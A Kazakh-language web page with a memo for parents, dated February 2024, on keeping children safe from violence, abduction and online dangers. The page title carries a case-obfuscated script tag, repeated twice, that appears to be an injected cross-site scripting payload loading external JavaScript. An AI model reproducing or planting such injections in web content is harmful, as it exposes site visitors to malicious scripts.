Жадынама.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.02.2024

Ата-аналарға арналған жадынама.

«Бала зорлық - зомбылықтың құрбаны болмау үшін не істеуі керек»

      Балаға ересе қадамдардан қауіп төнген жағдайда «ЖОҚ» деп айтуды үйретіңіз.

      Егер біреу оны ұстауға әрекет етсе, балаға«Бұл менің әкем емес (анам емес)» деп даусын шығарып айқайлауды үйретіңіз. Бұл айналасындағылардың назарын аудартады және қылмыскерді қаймықтырады.

      Балаға қайда баратынын, қай бағытпен, қай уақытта қайтатынын, кіммен болатынын хабарлап отыруды, егерде жоспары өзгеріп жатса қоңырау шалу қажет екенін үйретіңіз.

      Баланы балабақшадан және мектептен өзіңіз алуға тырысыңыз.

Егер басқа біреу алатын болса,алдын ала ескертіңіз.

      Балаға құпия сөз ойлап табыңыз. Бұл құпия сөз балаға білмеген бөтен адамдармен бірге кетпеуі немесе бөтен көлікке отырмауы үшін керек.

      Балаға жалғыз жүргеннен гөрідостарымен бірге қыдыру қауіпсіз екенін жеткізіңіз. Жалғыз қыдырған бала қылмыскердің назарын өзіне аудартады.

      Баланы жылына бір рет фотосуретке түсіріңіз. Тым болмағанда сізде жаңа фотосуреті болады.

 Балалардың Интернетте еркін отыруына жол бермеңіз.Баланың әлеуметтік желідегі өміріне белсенеат салысыңыз.

 

      Балаға Интернет желісіндегі қауіптілік туралы айтып ескертіңіз. Егер бала басқа Интернет қолданушы тарапынан келеңсіздікке немесе зорлық-зомбылыққа тап болған жағдайда, оған дереу жақын адамдарына хабарлау керектігін түсіндіріңіз. 

      Балабарлық жағдайды айтып жеткізе алатын ата-ананың қатарынан болыңыз.

Бала әрқашан оны жақсы көретініне, егер ол жоғалып кетсе немесе ұрланса, оны іздеу тоқтамайтынына сенімді болуы керек.

 

Просмотров: 1385


Пікір қосу



Деректерді қолтаңбаға қосу